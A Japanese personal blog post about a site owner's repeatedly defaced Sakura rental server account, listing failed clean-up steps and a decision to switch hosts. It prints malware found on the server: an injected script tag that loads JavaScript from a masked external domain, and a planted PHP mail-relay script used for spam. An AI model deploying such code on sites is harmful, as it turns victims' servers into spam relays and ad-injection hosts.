さくらレンタルサーバー改竄のため引っ越します

622views/投稿 2014-03-04/更新 2019-04-30

さくらレンタルサーバーのスタンダードを2つ使っていましたが、片方が何をやっても改竄されます。サポートにメールしても状況はわからないようです。単なるカスタマーサポートが返答していると思われるのでサーバーエンジニアの方に見てもらいたいものです。

WordPress以外のリモートファイルも

WordPress等とかCMSプログラムが問題の場合は関与しませんとの回答は的を得ていますが、しっかり書いてサポートに伝えているのですが、CMSやコンテンツプログラムを入れていない真っさらなドメインにindex.htmlしか置いていない所も改竄されたり自動ファイル生成されているのでCMSが原因でも、もう手に負えない。

もちろんマルチドメインで自分が契約したディレクトリは繋がってるとは言えますが、それでも何でも自動でファイルを生成されたりは別ドメインなら防げるでしょうよ。

2回試した事

  1. サーバー上のデータ全消去
  2. FTPパスワードの変更
  3. WordPressクリーンインストール
  4. WordPress「admin」から別名にしパスワードも強に
  5. プラグイン、テーマ等全部新品に取っ替え

これでもダメで今回の改竄では右上に某有名なモノがコンテンツに被る感じスクロールに追従して常住する最悪なスパムです。ご丁寧にWordPress管理画面にも出てきます。

sakuraserver-kaizan-01

index.htmlだけのドメインも出てきます。このindex.htmlファイル1つしか置いていないドメインにもWordPress入れているところにもスパムファイルの生成があり、かつindex.htmlなどFTPアップしただけのファイルも改竄されています。

<html><div style="position: absolute; right:0px; top:0px;"><script src="http://✕✕✕✕.com/js/widget.js" width="300" height="250" widget="1013" top="0" left="0"frameBorder="0"></script> </div></html>

こんな感じのコードが最後の</html>のすぐ下に挿入されています。

自動的に生成されているファイルはこのようなファイル名達でした。

sakuraserver-kaizan-02

  1. exist15s.php
  2. exists.php
  3. index.html(自分でアップしたファイル1つ)
  4. saers.php
  5. v5c67.php
  6. vexc1.php
  7. vexc67.php

これらのphp中身はこのような感じでした。

<?php
$to = stripslashes($_POST["to_address"]);
$BCC = stripslashes($_POST["BCC"]);
$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);
$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]);

$header = "MIME-Version: 1.0\r\n";
$header .= "Content-type: text/plain; charset=iso-8859-1\r\n";
$header .= "From: $from_name <$from_address>\r\n";
$header .= "Bcc: $BCC\r\n";
$header .= "Reply-To: $from_name <$from_address>\r\n";
$header .= "Subject: {$subject}\r\n";
$header .= "X-Mailer: PHP/".phpversion()."\r\n";

$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));

if($result)
{
echo 'good';
}
else
{
echo 'error : '.$result;
}
?>

さくらレンタルサーバーは、まともなイメージはあったのですが、全然スパマーに負けちゃってますね。残念です。

カスタマーサポートが機械的に回答するのは、

  1. ログを見て下さい
  2. 私が試した予防対策や全消去

の二つを言われます。ログを見て下さいがレベルが高すぎて見てみましたが理解不能です。/home/ユーザーID/log/access_log_[日付] として保存できるものです。

このような時の対策法はと言いますと、
サーバー移転が一番良い方法で解約です。

sakura-kaizan-03

できる事は2回もやってダメなら引っ越ししかありません。ねばって使うと疲弊します。もう片方は[利用中]継続しますけどね。

関連おすすめ記事